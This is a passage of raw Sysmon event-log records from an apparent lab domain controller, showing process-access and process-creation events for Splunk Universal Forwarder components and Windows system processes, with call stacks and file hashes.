Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AA-6005-8405-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:46.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:46.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-96AA-6005-8405-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AA-6005-8405-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.762{59A5CD1D-96AA-6005-8405-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.092{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AA-6005-8305-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.090{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.090{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-96AA-6005-8305-00000000A301}6552C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.090{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AA-6005-8305-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.090{59A5CD1D-96AA-6005-8305-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.917{59A5CD1D-96AC-6005-8605-00000000A301}14084128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AC-6005-8605-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:48.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:48.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-96AC-6005-8605-00000000A301}1408C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AC-6005-8605-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.762{59A5CD1D-96AC-6005-8605-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.245{59A5CD1D-96AC-6005-8505-00000000A301}49206296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.093{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AC-6005-8505-00000000A301}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:48.092{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 